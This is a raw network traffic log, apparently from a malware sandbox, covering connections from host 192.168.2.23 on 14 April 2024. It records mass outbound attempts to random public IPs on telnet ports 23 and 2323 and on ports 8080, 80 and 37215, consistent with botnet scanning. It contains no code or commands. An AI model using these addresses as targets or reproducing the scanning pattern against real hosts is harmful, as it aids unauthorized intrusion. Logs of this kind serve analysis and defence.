                                                        Apr 14, 2024 16:34:54.847421885 CEST1047023192.168.2.23147.209.162.34
                                                        Apr 14, 2024 16:34:54.847434044 CEST1047023192.168.2.2344.211.92.76
                                                        Apr 14, 2024 16:34:54.847436905 CEST1047023192.168.2.235.111.85.34
                                                        Apr 14, 2024 16:34:54.847451925 CEST1047023192.168.2.2349.135.129.176
                                                        Apr 14, 2024 16:34:54.847465992 CEST1047023192.168.2.2317.69.84.87
                                                        Apr 14, 2024 16:34:54.847477913 CEST1047023192.168.2.2320.236.68.134
                                                        Apr 14, 2024 16:34:54.847479105 CEST1047023192.168.2.2378.180.93.20
                                                        Apr 14, 2024 16:34:54.847495079 CEST1047023192.168.2.23183.187.145.19
                                                        Apr 14, 2024 16:34:54.847506046 CEST104702323192.168.2.23158.44.184.244
                                                        Apr 14, 2024 16:34:54.847507000 CEST1047023192.168.2.234.237.54.111
                                                        Apr 14, 2024 16:34:54.847520113 CEST1047023192.168.2.2397.113.195.228
                                                        Apr 14, 2024 16:34:54.847520113 CEST1047023192.168.2.23150.103.185.34
                                                        Apr 14, 2024 16:34:54.847532034 CEST1047023192.168.2.239.22.250.120
                                                        Apr 14, 2024 16:34:54.847548962 CEST1047023192.168.2.2376.4.10.210
                                                        Apr 14, 2024 16:34:54.847551107 CEST1047023192.168.2.23171.3.94.62
                                                        Apr 14, 2024 16:34:54.847562075 CEST1047023192.168.2.2362.85.168.89
                                                        Apr 14, 2024 16:34:54.847563982 CEST1047023192.168.2.2358.35.42.225
                                                        Apr 14, 2024 16:34:54.847578049 CEST1047023192.168.2.2340.67.81.71
                                                        Apr 14, 2024 16:34:54.847580910 CEST104702323192.168.2.2312.99.0.148
                                                        Apr 14, 2024 16:34:54.847603083 CEST1047023192.168.2.2325.183.6.96
                                                        Apr 14, 2024 16:34:54.847631931 CEST1047023192.168.2.23129.29.160.38
                                                        Apr 14, 2024 16:34:54.847631931 CEST1047023192.168.2.23122.89.28.112
                                                        Apr 14, 2024 16:34:54.847631931 CEST1047023192.168.2.23222.95.239.201
                                                        Apr 14, 2024 16:34:54.847639084 CEST1047023192.168.2.23189.228.200.52
                                                        Apr 14, 2024 16:34:54.847642899 CEST1047023192.168.2.23105.11.155.98
                                                        Apr 14, 2024 16:34:54.847662926 CEST1047023192.168.2.23152.85.21.116
                                                        Apr 14, 2024 16:34:54.847668886 CEST1047023192.168.2.2337.74.38.218
                                                        Apr 14, 2024 16:34:54.847668886 CEST1047023192.168.2.23206.105.56.169
                                                        Apr 14, 2024 16:34:54.847676992 CEST104702323192.168.2.2313.238.194.63
                                                        Apr 14, 2024 16:34:54.847690105 CEST1047023192.168.2.23193.25.97.104
                                                        Apr 14, 2024 16:34:54.847706079 CEST1047023192.168.2.23164.167.190.143
                                                        Apr 14, 2024 16:34:54.847717047 CEST1047023192.168.2.2365.72.254.33
                                                        Apr 14, 2024 16:34:54.847718000 CEST1047023192.168.2.2324.182.103.194
                                                        Apr 14, 2024 16:34:54.847728014 CEST1047023192.168.2.2341.209.2.223
                                                        Apr 14, 2024 16:34:54.847737074 CEST1047023192.168.2.2353.43.208.109
                                                        Apr 14, 2024 16:34:54.847737074 CEST1047023192.168.2.23137.57.255.193
                                                        Apr 14, 2024 16:34:54.847758055 CEST1047023192.168.2.2378.185.244.123
                                                        Apr 14, 2024 16:34:54.847768068 CEST1047023192.168.2.2370.45.113.184
                                                        Apr 14, 2024 16:34:54.847776890 CEST104702323192.168.2.23121.26.56.52
                                                        Apr 14, 2024 16:34:54.847783089 CEST1047023192.168.2.23129.46.95.53
                                                        Apr 14, 2024 16:34:54.847790956 CEST1047023192.168.2.23154.231.42.72
                                                        Apr 14, 2024 16:34:54.847794056 CEST1047023192.168.2.2382.64.87.41
                                                        Apr 14, 2024 16:34:54.847817898 CEST1047023192.168.2.23114.201.40.69
                                                        Apr 14, 2024 16:34:54.847819090 CEST1047023192.168.2.23223.55.210.177
                                                        Apr 14, 2024 16:34:54.847829103 CEST1047023192.168.2.23120.120.73.22
                                                        Apr 14, 2024 16:34:54.847835064 CEST1047023192.168.2.2392.88.181.64
                                                        Apr 14, 2024 16:34:54.847846031 CEST1047023192.168.2.23116.191.19.66
                                                        Apr 14, 2024 16:34:54.847851038 CEST1047023192.168.2.2381.73.98.7
                                                        Apr 14, 2024 16:34:54.847882986 CEST104702323192.168.2.2383.17.238.242
                                                        Apr 14, 2024 16:34:54.847883940 CEST1047023192.168.2.23146.116.240.163
                                                        Apr 14, 2024 16:34:54.847884893 CEST1047023192.168.2.23150.227.229.5
                                                        Apr 14, 2024 16:34:54.847884893 CEST1047023192.168.2.23123.173.14.93
                                                        Apr 14, 2024 16:34:54.847889900 CEST1047023192.168.2.23129.156.180.232
                                                        Apr 14, 2024 16:34:54.847919941 CEST1047023192.168.2.23137.214.75.218
                                                        Apr 14, 2024 16:34:54.847922087 CEST1047023192.168.2.23109.216.131.154
                                                        Apr 14, 2024 16:34:54.847923040 CEST1047023192.168.2.23135.116.187.109
                                                        Apr 14, 2024 16:34:54.847934961 CEST1047023192.168.2.2383.89.131.48
                                                        Apr 14, 2024 16:34:54.847945929 CEST1047023192.168.2.2363.107.100.204
                                                        Apr 14, 2024 16:34:54.847956896 CEST104702323192.168.2.2363.149.252.147
                                                        Apr 14, 2024 16:34:54.847969055 CEST1047023192.168.2.23200.39.85.48
                                                        Apr 14, 2024 16:34:54.847975969 CEST1047023192.168.2.23207.38.253.6
                                                        Apr 14, 2024 16:34:54.847980022 CEST1047023192.168.2.23184.23.255.124
                                                        Apr 14, 2024 16:34:54.848006964 CEST1047023192.168.2.2376.234.115.19
                                                        Apr 14, 2024 16:34:54.848011017 CEST1047023192.168.2.23134.174.197.216
                                                        Apr 14, 2024 16:34:54.848020077 CEST1047023192.168.2.23149.233.8.26
                                                        Apr 14, 2024 16:34:54.848020077 CEST1047023192.168.2.23204.28.143.104
                                                        Apr 14, 2024 16:34:54.848026037 CEST1047023192.168.2.23131.89.211.115
                                                        Apr 14, 2024 16:34:54.848033905 CEST1047023192.168.2.23194.207.168.253
                                                        Apr 14, 2024 16:34:54.848047018 CEST104702323192.168.2.23180.172.7.255
                                                        Apr 14, 2024 16:34:54.848051071 CEST1047023192.168.2.2342.54.155.1
                                                        Apr 14, 2024 16:34:54.848058939 CEST1047023192.168.2.2370.104.72.249
                                                        Apr 14, 2024 16:34:54.848058939 CEST1047023192.168.2.2352.206.208.90
                                                        Apr 14, 2024 16:34:54.848076105 CEST1047023192.168.2.2365.85.7.155
                                                        Apr 14, 2024 16:34:54.848082066 CEST1047023192.168.2.23152.180.106.72
                                                        Apr 14, 2024 16:34:54.848088026 CEST1047023192.168.2.2361.64.50.130
                                                        Apr 14, 2024 16:34:54.848108053 CEST1047023192.168.2.2380.9.255.198
                                                        Apr 14, 2024 16:34:54.848114967 CEST1047023192.168.2.2351.134.13.13
                                                        Apr 14, 2024 16:34:54.848130941 CEST1047023192.168.2.23118.187.5.230
                                                        Apr 14, 2024 16:34:54.848131895 CEST1047023192.168.2.23158.188.33.110
                                                        Apr 14, 2024 16:34:54.848133087 CEST1047023192.168.2.23137.167.82.141
                                                        Apr 14, 2024 16:34:54.848134995 CEST104702323192.168.2.2323.80.188.129
                                                        Apr 14, 2024 16:34:54.848135948 CEST1047023192.168.2.23153.220.192.60
                                                        Apr 14, 2024 16:34:54.848154068 CEST1047023192.168.2.23223.57.103.143
                                                        Apr 14, 2024 16:34:54.848154068 CEST1047023192.168.2.23198.179.40.219
                                                        Apr 14, 2024 16:34:54.848156929 CEST1047023192.168.2.23114.236.170.0
                                                        Apr 14, 2024 16:34:54.848170042 CEST1047023192.168.2.23108.239.67.16
                                                        Apr 14, 2024 16:34:54.848182917 CEST1047023192.168.2.2371.19.239.255
                                                        Apr 14, 2024 16:34:54.848191023 CEST104702323192.168.2.2384.75.113.32
                                                        Apr 14, 2024 16:34:54.848191023 CEST1047023192.168.2.23112.152.40.184
                                                        Apr 14, 2024 16:34:54.848192930 CEST1047023192.168.2.2399.243.41.173
                                                        Apr 14, 2024 16:34:54.848196983 CEST1047023192.168.2.2327.98.60.93
                                                        Apr 14, 2024 16:34:54.848198891 CEST1047023192.168.2.2398.92.187.146
                                                        Apr 14, 2024 16:34:54.848201036 CEST1047023192.168.2.2331.252.27.9
                                                        Apr 14, 2024 16:34:54.848212957 CEST1047023192.168.2.2365.35.189.130
                                                        Apr 14, 2024 16:34:54.848238945 CEST1047023192.168.2.23143.237.135.193
                                                        Apr 14, 2024 16:34:54.848258018 CEST1047023192.168.2.23167.66.98.226
                                                        Apr 14, 2024 16:34:54.848258018 CEST1047023192.168.2.23205.100.90.91
                                                        Apr 14, 2024 16:34:54.848258018 CEST1047023192.168.2.2312.240.146.137
                                                        Apr 14, 2024 16:34:54.848267078 CEST104702323192.168.2.2375.153.181.215
                                                        Apr 14, 2024 16:34:54.848269939 CEST1047023192.168.2.23179.217.76.125
                                                        Apr 14, 2024 16:34:54.848294020 CEST1047023192.168.2.23205.228.23.238
                                                        Apr 14, 2024 16:34:54.848297119 CEST1047023192.168.2.23142.188.191.176
                                                        Apr 14, 2024 16:34:54.848303080 CEST1047023192.168.2.23182.109.138.143
                                                        Apr 14, 2024 16:34:54.848304987 CEST1047023192.168.2.23130.9.47.1
                                                        Apr 14, 2024 16:34:54.848320961 CEST1047023192.168.2.2384.170.45.97
                                                        Apr 14, 2024 16:34:54.848331928 CEST1047023192.168.2.23101.248.88.61
                                                        Apr 14, 2024 16:34:54.848331928 CEST1047023192.168.2.23168.171.36.151
                                                        Apr 14, 2024 16:34:54.848345995 CEST104702323192.168.2.23191.213.89.245
                                                        Apr 14, 2024 16:34:54.848350048 CEST1047023192.168.2.2377.35.253.5
                                                        Apr 14, 2024 16:34:54.848370075 CEST1047023192.168.2.2360.124.246.145
                                                        Apr 14, 2024 16:34:54.848380089 CEST1047023192.168.2.23158.14.46.163
                                                        Apr 14, 2024 16:34:54.848380089 CEST1047023192.168.2.2349.37.37.204
                                                        Apr 14, 2024 16:34:54.848381996 CEST1047023192.168.2.23200.143.120.33
                                                        Apr 14, 2024 16:34:54.848395109 CEST1047023192.168.2.23117.170.115.137
                                                        Apr 14, 2024 16:34:54.848407984 CEST1047023192.168.2.2331.15.150.7
                                                        Apr 14, 2024 16:34:54.848407984 CEST1047023192.168.2.2360.185.248.153
                                                        Apr 14, 2024 16:34:54.848427057 CEST1047023192.168.2.23117.100.74.98
                                                        Apr 14, 2024 16:34:54.848443985 CEST104702323192.168.2.23147.163.83.228
                                                        Apr 14, 2024 16:34:54.848450899 CEST1047023192.168.2.23156.63.49.153
                                                        Apr 14, 2024 16:34:54.848453999 CEST1047023192.168.2.2383.77.38.143
                                                        Apr 14, 2024 16:34:54.848459959 CEST1047023192.168.2.23112.63.12.87
                                                        Apr 14, 2024 16:34:54.848479033 CEST1047023192.168.2.23169.247.11.158
                                                        Apr 14, 2024 16:34:54.848490000 CEST1047023192.168.2.2382.207.14.22
                                                        Apr 14, 2024 16:34:54.848491907 CEST1047023192.168.2.23180.79.227.208
                                                        Apr 14, 2024 16:34:54.848499060 CEST1047023192.168.2.23212.118.123.95
                                                        Apr 14, 2024 16:34:54.848509073 CEST1047023192.168.2.23136.160.198.61
                                                        Apr 14, 2024 16:34:54.848516941 CEST1047023192.168.2.2323.3.130.120
                                                        Apr 14, 2024 16:34:54.848516941 CEST1047023192.168.2.23198.106.98.118
                                                        Apr 14, 2024 16:34:54.848522902 CEST104702323192.168.2.2323.95.247.145
                                                        Apr 14, 2024 16:34:54.848536968 CEST1047023192.168.2.2379.73.87.5
                                                        Apr 14, 2024 16:34:54.848547935 CEST1047023192.168.2.2314.78.78.92
                                                        Apr 14, 2024 16:34:54.848566055 CEST1047023192.168.2.2349.131.229.178
                                                        Apr 14, 2024 16:34:54.848568916 CEST1047023192.168.2.2399.157.253.190
                                                        Apr 14, 2024 16:34:54.848586082 CEST1047023192.168.2.23173.230.76.217
                                                        Apr 14, 2024 16:34:54.848598003 CEST1047023192.168.2.2340.202.159.16
                                                        Apr 14, 2024 16:34:54.848598003 CEST1047023192.168.2.23177.191.213.126
                                                        Apr 14, 2024 16:34:54.848615885 CEST1047023192.168.2.2392.149.173.81
                                                        Apr 14, 2024 16:34:54.848618984 CEST1047023192.168.2.23115.5.29.173
                                                        Apr 14, 2024 16:34:54.848625898 CEST104702323192.168.2.23115.78.43.186
                                                        Apr 14, 2024 16:34:54.848644018 CEST1047023192.168.2.23105.22.195.201
                                                        Apr 14, 2024 16:34:54.848644972 CEST1047023192.168.2.23130.241.216.46
                                                        Apr 14, 2024 16:34:54.848648071 CEST1047023192.168.2.2374.96.13.136
                                                        Apr 14, 2024 16:34:54.848660946 CEST1047023192.168.2.23204.142.220.50
                                                        Apr 14, 2024 16:34:54.848661900 CEST1047023192.168.2.2365.183.171.224
                                                        Apr 14, 2024 16:34:54.848690033 CEST1047023192.168.2.23206.182.98.228
                                                        Apr 14, 2024 16:34:54.848692894 CEST1047023192.168.2.23148.10.244.102
                                                        Apr 14, 2024 16:34:54.848699093 CEST1047023192.168.2.2379.41.119.138
                                                        Apr 14, 2024 16:34:54.848704100 CEST1047023192.168.2.23166.239.184.83
                                                        Apr 14, 2024 16:34:54.848710060 CEST104702323192.168.2.2373.111.53.165
                                                        Apr 14, 2024 16:34:54.848710060 CEST1047023192.168.2.23178.50.186.107
                                                        Apr 14, 2024 16:34:54.848731995 CEST1047023192.168.2.232.117.2.43
                                                        Apr 14, 2024 16:34:54.848750114 CEST1047023192.168.2.23125.57.99.55
                                                        Apr 14, 2024 16:34:54.848752975 CEST1047023192.168.2.2312.185.57.178
                                                        Apr 14, 2024 16:34:54.848752975 CEST1047023192.168.2.2381.69.65.50
                                                        Apr 14, 2024 16:34:54.848773956 CEST1047023192.168.2.2386.202.184.232
                                                        Apr 14, 2024 16:34:54.848778009 CEST1047023192.168.2.2320.52.111.99
                                                        Apr 14, 2024 16:34:54.848779917 CEST1047023192.168.2.23115.144.251.141
                                                        Apr 14, 2024 16:34:54.848781109 CEST1047023192.168.2.23151.205.62.109
                                                        Apr 14, 2024 16:34:54.848798990 CEST104702323192.168.2.2364.187.188.119
                                                        Apr 14, 2024 16:34:54.848798990 CEST1047023192.168.2.2343.175.176.125
                                                        Apr 14, 2024 16:34:54.848810911 CEST1047023192.168.2.23124.241.100.205
                                                        Apr 14, 2024 16:34:54.848819971 CEST1047023192.168.2.2392.183.166.31
                                                        Apr 14, 2024 16:34:54.848838091 CEST1047023192.168.2.235.118.214.43
                                                        Apr 14, 2024 16:34:54.848839045 CEST1047023192.168.2.2323.85.139.7
                                                        Apr 14, 2024 16:34:54.848855972 CEST1047023192.168.2.2381.149.110.101
                                                        Apr 14, 2024 16:34:54.848855972 CEST1047023192.168.2.2374.15.141.90
                                                        Apr 14, 2024 16:34:54.848876953 CEST1047023192.168.2.23187.77.116.127
                                                        Apr 14, 2024 16:34:54.848876953 CEST1047023192.168.2.23125.190.209.212
                                                        Apr 14, 2024 16:34:54.848897934 CEST104702323192.168.2.23176.215.31.107
                                                        Apr 14, 2024 16:34:54.848903894 CEST1047023192.168.2.23188.69.115.102
                                                        Apr 14, 2024 16:34:54.848915100 CEST1047023192.168.2.23155.250.249.228
                                                        Apr 14, 2024 16:34:54.848917007 CEST1047023192.168.2.23171.176.99.116
                                                        Apr 14, 2024 16:34:54.848917007 CEST1047023192.168.2.23164.66.220.52
                                                        Apr 14, 2024 16:34:54.848927021 CEST1047023192.168.2.23190.108.122.143
                                                        Apr 14, 2024 16:34:54.848941088 CEST1047023192.168.2.2313.212.113.34
                                                        Apr 14, 2024 16:34:54.848953962 CEST1047023192.168.2.23123.179.121.179
                                                        Apr 14, 2024 16:34:54.848959923 CEST1047023192.168.2.2394.98.142.166
                                                        Apr 14, 2024 16:34:54.848977089 CEST1047023192.168.2.23217.188.113.159
                                                        Apr 14, 2024 16:34:54.848977089 CEST104702323192.168.2.2336.65.153.5
                                                        Apr 14, 2024 16:34:54.848978043 CEST1047023192.168.2.2361.51.63.108
                                                        Apr 14, 2024 16:34:54.849001884 CEST1047023192.168.2.2313.157.216.44
                                                        Apr 14, 2024 16:34:54.849011898 CEST1047023192.168.2.2386.82.3.17
                                                        Apr 14, 2024 16:34:54.849020958 CEST1047023192.168.2.2361.58.5.33
                                                        Apr 14, 2024 16:34:54.849025965 CEST1047023192.168.2.23137.15.83.47
                                                        Apr 14, 2024 16:34:54.849030972 CEST1047023192.168.2.2387.241.67.1
                                                        Apr 14, 2024 16:34:54.849035025 CEST1047023192.168.2.23137.192.184.217
                                                        Apr 14, 2024 16:34:54.849047899 CEST1047023192.168.2.23105.219.178.49
                                                        Apr 14, 2024 16:34:54.849051952 CEST1047023192.168.2.2358.83.118.69
                                                        Apr 14, 2024 16:34:54.849071980 CEST104702323192.168.2.23111.190.44.231
                                                        Apr 14, 2024 16:34:54.849073887 CEST1047023192.168.2.2388.128.167.179
                                                        Apr 14, 2024 16:34:54.849090099 CEST1047023192.168.2.2339.198.143.138
                                                        Apr 14, 2024 16:34:54.849092007 CEST1047023192.168.2.2361.110.88.124
                                                        Apr 14, 2024 16:34:54.849100113 CEST1047023192.168.2.2318.84.122.208
                                                        Apr 14, 2024 16:34:54.849103928 CEST1047023192.168.2.23169.211.165.8
                                                        Apr 14, 2024 16:34:54.849117994 CEST1047023192.168.2.23119.196.43.2
                                                        Apr 14, 2024 16:34:54.849136114 CEST1047023192.168.2.2312.120.209.102
                                                        Apr 14, 2024 16:34:54.849134922 CEST1047023192.168.2.2377.27.61.164
                                                        Apr 14, 2024 16:34:54.849154949 CEST1047023192.168.2.23134.237.135.181
                                                        Apr 14, 2024 16:34:54.849157095 CEST104702323192.168.2.2347.138.182.74
                                                        Apr 14, 2024 16:34:54.849168062 CEST1047023192.168.2.23168.193.82.169
                                                        Apr 14, 2024 16:34:54.849175930 CEST1047023192.168.2.23153.17.164.39
                                                        Apr 14, 2024 16:34:54.849184990 CEST1047023192.168.2.23107.204.171.235
                                                        Apr 14, 2024 16:34:54.849189997 CEST1047023192.168.2.23151.142.231.35
                                                        Apr 14, 2024 16:34:54.849198103 CEST1047023192.168.2.23181.41.175.228
                                                        Apr 14, 2024 16:34:54.849205971 CEST1047023192.168.2.2325.67.109.165
                                                        Apr 14, 2024 16:34:54.849214077 CEST1047023192.168.2.23148.160.22.16
                                                        Apr 14, 2024 16:34:54.849224091 CEST1047023192.168.2.2381.58.7.149
                                                        Apr 14, 2024 16:34:54.849237919 CEST1047023192.168.2.23176.34.114.16
                                                        Apr 14, 2024 16:34:54.849247932 CEST104702323192.168.2.23171.33.217.13
                                                        Apr 14, 2024 16:34:54.849252939 CEST1047023192.168.2.23210.59.47.195
                                                        Apr 14, 2024 16:34:54.849252939 CEST1047023192.168.2.2340.20.232.225
                                                        Apr 14, 2024 16:34:54.849276066 CEST1047023192.168.2.2388.12.211.86
                                                        Apr 14, 2024 16:34:54.849283934 CEST1047023192.168.2.23122.150.34.57
                                                        Apr 14, 2024 16:34:54.849283934 CEST1047023192.168.2.2398.200.204.77
                                                        Apr 14, 2024 16:34:54.849293947 CEST1047023192.168.2.23222.131.50.8
                                                        Apr 14, 2024 16:34:54.849299908 CEST1047023192.168.2.2381.166.234.195
                                                        Apr 14, 2024 16:34:54.849309921 CEST1047023192.168.2.2358.157.217.202
                                                        Apr 14, 2024 16:34:54.849322081 CEST1047023192.168.2.23150.231.55.125
                                                        Apr 14, 2024 16:34:54.849337101 CEST104702323192.168.2.23165.170.50.99
                                                        Apr 14, 2024 16:34:54.849350929 CEST1047023192.168.2.23212.170.200.55
                                                        Apr 14, 2024 16:34:54.849350929 CEST1047023192.168.2.23194.149.47.191
                                                        Apr 14, 2024 16:34:54.849351883 CEST1047023192.168.2.23185.211.197.130
                                                        Apr 14, 2024 16:34:54.849371910 CEST1047023192.168.2.2346.112.47.198
                                                        Apr 14, 2024 16:34:54.849380016 CEST1047023192.168.2.23200.26.219.200
                                                        Apr 14, 2024 16:34:54.849392891 CEST1047023192.168.2.23166.149.139.13
                                                        Apr 14, 2024 16:34:54.849410057 CEST1047023192.168.2.2367.67.51.222
                                                        Apr 14, 2024 16:34:54.849412918 CEST1047023192.168.2.23133.151.236.215
                                                        Apr 14, 2024 16:34:54.849417925 CEST104702323192.168.2.2314.124.176.166
                                                        Apr 14, 2024 16:34:54.849416018 CEST1047023192.168.2.23151.106.170.45
                                                        Apr 14, 2024 16:34:54.849435091 CEST1047023192.168.2.23101.113.61.79
                                                        Apr 14, 2024 16:34:54.849442005 CEST1047023192.168.2.23112.91.235.41
                                                        Apr 14, 2024 16:34:54.849451065 CEST1047023192.168.2.23135.112.155.181
                                                        Apr 14, 2024 16:34:54.849467039 CEST1047023192.168.2.2392.14.9.3
                                                        Apr 14, 2024 16:34:54.849467039 CEST1047023192.168.2.23169.131.235.58
                                                        Apr 14, 2024 16:34:54.849467039 CEST1047023192.168.2.23108.104.61.46
                                                        Apr 14, 2024 16:34:54.849483967 CEST1047023192.168.2.2386.215.156.116
                                                        Apr 14, 2024 16:34:54.849493027 CEST1047023192.168.2.2398.72.186.202
                                                        Apr 14, 2024 16:34:54.849508047 CEST104702323192.168.2.2373.44.132.103
                                                        Apr 14, 2024 16:34:54.849519968 CEST1047023192.168.2.2364.60.111.166
                                                        Apr 14, 2024 16:34:54.849519968 CEST1047023192.168.2.2385.1.137.206
                                                        Apr 14, 2024 16:34:54.849519968 CEST1047023192.168.2.23148.30.189.41
                                                        Apr 14, 2024 16:34:54.849534035 CEST1047023192.168.2.2367.108.233.160
                                                        Apr 14, 2024 16:34:54.849538088 CEST80804021494.122.4.247192.168.2.23
                                                        Apr 14, 2024 16:34:54.849962950 CEST80803665494.120.24.214192.168.2.23
                                                        Apr 14, 2024 16:34:54.854154110 CEST80803667694.120.24.214192.168.2.23
                                                        Apr 14, 2024 16:34:54.854217052 CEST366768080192.168.2.2394.120.24.214
                                                        Apr 14, 2024 16:34:54.854240894 CEST366768080192.168.2.2394.120.24.214
                                                        Apr 14, 2024 16:34:54.886480093 CEST363728080192.168.2.2395.139.180.128
                                                        Apr 14, 2024 16:34:54.897783995 CEST80804633831.44.132.0192.168.2.23
                                                        Apr 14, 2024 16:34:54.898271084 CEST463388080192.168.2.2331.44.132.0
                                                        Apr 14, 2024 16:34:55.001657009 CEST80801303085.31.48.33192.168.2.23
                                                        Apr 14, 2024 16:34:55.009371996 CEST80801303094.103.184.48192.168.2.23
                                                        Apr 14, 2024 16:34:55.078851938 CEST80801303062.96.144.120192.168.2.23
                                                        Apr 14, 2024 16:34:55.083446980 CEST80803765631.48.254.114192.168.2.23
                                                        Apr 14, 2024 16:34:55.083967924 CEST376568080192.168.2.2331.48.254.114
                                                        Apr 14, 2024 16:34:55.084112883 CEST80801303094.130.176.65192.168.2.23
                                                        Apr 14, 2024 16:34:55.090799093 CEST80801303062.2.225.66192.168.2.23
                                                        Apr 14, 2024 16:34:55.095716953 CEST80801303062.28.227.139192.168.2.23
                                                        Apr 14, 2024 16:34:55.096385956 CEST80801303094.152.33.99192.168.2.23
                                                        Apr 14, 2024 16:34:55.098233938 CEST80801303085.214.107.183192.168.2.23
                                                        Apr 14, 2024 16:34:55.101900101 CEST80801303095.216.183.96192.168.2.23
                                                        Apr 14, 2024 16:34:55.105600119 CEST80801303085.214.19.209192.168.2.23
                                                        Apr 14, 2024 16:34:55.109508991 CEST80801303095.165.110.236192.168.2.23
                                                        Apr 14, 2024 16:34:55.119328022 CEST80801303094.123.188.71192.168.2.23
                                                        Apr 14, 2024 16:34:55.119463921 CEST80801303095.135.12.124192.168.2.23
                                                        Apr 14, 2024 16:34:55.119512081 CEST130308080192.168.2.2394.123.188.71
                                                        Apr 14, 2024 16:34:55.123181105 CEST80801303094.123.186.143192.168.2.23
                                                        Apr 14, 2024 16:34:55.123333931 CEST130308080192.168.2.2394.123.186.143
                                                        Apr 14, 2024 16:34:55.123408079 CEST80801303094.122.17.71192.168.2.23
                                                        Apr 14, 2024 16:34:55.123533010 CEST130308080192.168.2.2394.122.17.71
                                                        Apr 14, 2024 16:34:55.126060963 CEST80801303094.123.6.184192.168.2.23
                                                        Apr 14, 2024 16:34:55.126121044 CEST130308080192.168.2.2394.123.6.184
                                                        Apr 14, 2024 16:34:55.127269983 CEST80801303094.121.201.193192.168.2.23
                                                        Apr 14, 2024 16:34:55.127341986 CEST130308080192.168.2.2394.121.201.193
                                                        Apr 14, 2024 16:34:55.128528118 CEST80801303031.200.113.106192.168.2.23
                                                        Apr 14, 2024 16:34:55.128602028 CEST130308080192.168.2.2331.200.113.106
                                                        Apr 14, 2024 16:34:55.129097939 CEST80801303031.200.31.90192.168.2.23
                                                        Apr 14, 2024 16:34:55.129153013 CEST130308080192.168.2.2331.200.31.90
                                                        Apr 14, 2024 16:34:55.130665064 CEST3721514310197.9.225.182192.168.2.23
                                                        Apr 14, 2024 16:34:55.130841970 CEST1431037215192.168.2.23197.9.225.182
                                                        Apr 14, 2024 16:34:55.130882978 CEST3721514310197.9.225.182192.168.2.23
                                                        Apr 14, 2024 16:34:55.133471966 CEST80801303085.140.61.58192.168.2.23
                                                        Apr 14, 2024 16:34:55.136533976 CEST80801303095.209.141.185192.168.2.23
                                                        Apr 14, 2024 16:34:55.137394905 CEST80801303094.77.80.223192.168.2.23
                                                        Apr 14, 2024 16:34:55.138751984 CEST2310470115.144.251.141192.168.2.23
                                                        Apr 14, 2024 16:34:55.142318010 CEST358608080192.168.2.2331.136.135.135
                                                        Apr 14, 2024 16:34:55.143352985 CEST80801303085.233.151.217192.168.2.23
                                                        Apr 14, 2024 16:34:55.146708012 CEST2310470115.5.29.173192.168.2.23
                                                        Apr 14, 2024 16:34:55.146725893 CEST80801303095.142.129.47192.168.2.23
                                                        Apr 14, 2024 16:34:55.148468971 CEST80801303062.90.178.75192.168.2.23
                                                        Apr 14, 2024 16:34:55.148854971 CEST232310470180.67.87.125192.168.2.23
                                                        Apr 14, 2024 16:34:55.150222063 CEST80801303085.250.213.238192.168.2.23
                                                        Apr 14, 2024 16:34:55.152652025 CEST80803853095.96.87.14192.168.2.23
                                                        Apr 14, 2024 16:34:55.152688026 CEST3721514310197.5.34.243192.168.2.23
                                                        Apr 14, 2024 16:34:55.152868986 CEST385308080192.168.2.2395.96.87.14
                                                        Apr 14, 2024 16:34:55.159193993 CEST231047014.78.78.92192.168.2.23
                                                        Apr 14, 2024 16:34:55.162813902 CEST80801303062.141.81.10192.168.2.23
                                                        Apr 14, 2024 16:34:55.163017988 CEST130308080192.168.2.2362.141.81.10
                                                        Apr 14, 2024 16:34:55.164076090 CEST3721514310197.159.68.10192.168.2.23
                                                        Apr 14, 2024 16:34:55.174595118 CEST80801303031.63.60.102192.168.2.23
                                                        Apr 14, 2024 16:34:55.183521032 CEST80804023294.122.4.247192.168.2.23
                                                        Apr 14, 2024 16:34:55.185062885 CEST2310470194.149.47.191192.168.2.23
                                                        Apr 14, 2024 16:34:55.185645103 CEST231047060.185.248.153192.168.2.23
                                                        Apr 14, 2024 16:34:55.186678886 CEST80806036685.95.177.45192.168.2.23
                                                        Apr 14, 2024 16:34:55.186763048 CEST603668080192.168.2.2385.95.177.45
                                                        Apr 14, 2024 16:34:55.195998907 CEST231047095.86.80.170192.168.2.23
                                                        Apr 14, 2024 16:34:55.196266890 CEST1047023192.168.2.2395.86.80.170
                                                        Apr 14, 2024 16:34:55.196692944 CEST80801303094.205.247.87192.168.2.23
                                                        Apr 14, 2024 16:34:55.202219009 CEST80803667694.120.24.214192.168.2.23
                                                        Apr 14, 2024 16:34:55.202343941 CEST231047087.241.67.1192.168.2.23
                                                        Apr 14, 2024 16:34:55.208333015 CEST80801303094.141.227.210192.168.2.23
                                                        Apr 14, 2024 16:34:55.229777098 CEST3721514310197.242.81.164192.168.2.23
                                                        Apr 14, 2024 16:34:55.244050026 CEST80801303062.74.148.172192.168.2.23
                                                        Apr 14, 2024 16:34:55.301800966 CEST3721514310197.130.171.241192.168.2.23
                                                        Apr 14, 2024 16:34:55.379627943 CEST1277480192.168.2.2395.235.126.179
                                                        Apr 14, 2024 16:34:55.379641056 CEST1277480192.168.2.2395.15.24.245
                                                        Apr 14, 2024 16:34:55.379658937 CEST1277480192.168.2.2395.239.179.241
                                                        Apr 14, 2024 16:34:55.379693985 CEST1277480192.168.2.2395.92.114.160
                                                        Apr 14, 2024 16:34:55.379690886 CEST1277480192.168.2.2395.188.88.254
                                                        Apr 14, 2024 16:34:55.379693985 CEST1277480192.168.2.2395.39.62.115
                                                        Apr 14, 2024 16:34:55.379766941 CEST1277480192.168.2.2395.196.223.36
                                                        Apr 14, 2024 16:34:55.379766941 CEST1277480192.168.2.2395.17.0.183
                                                        Apr 14, 2024 16:34:55.379777908 CEST1277480192.168.2.2395.125.27.83
                                                        Apr 14, 2024 16:34:55.379789114 CEST1277480192.168.2.2395.149.171.45
                                                        Apr 14, 2024 16:34:55.379806995 CEST1277480192.168.2.2395.195.177.128
                                                        Apr 14, 2024 16:34:55.379827023 CEST1277480192.168.2.2395.64.140.197
                                                        Apr 14, 2024 16:34:55.379831076 CEST1277480192.168.2.2395.132.76.51
                                                        Apr 14, 2024 16:34:55.379832983 CEST1277480192.168.2.2395.180.201.201
                                                        Apr 14, 2024 16:34:55.379837036 CEST1277480192.168.2.2395.58.157.183
                                                        Apr 14, 2024 16:34:55.379867077 CEST1277480192.168.2.2395.36.67.89
                                                        Apr 14, 2024 16:34:55.379875898 CEST1277480192.168.2.2395.20.254.68
                                                        Apr 14, 2024 16:34:55.379905939 CEST1277480192.168.2.2395.60.9.128
                                                        Apr 14, 2024 16:34:55.379924059 CEST1277480192.168.2.2395.238.188.101
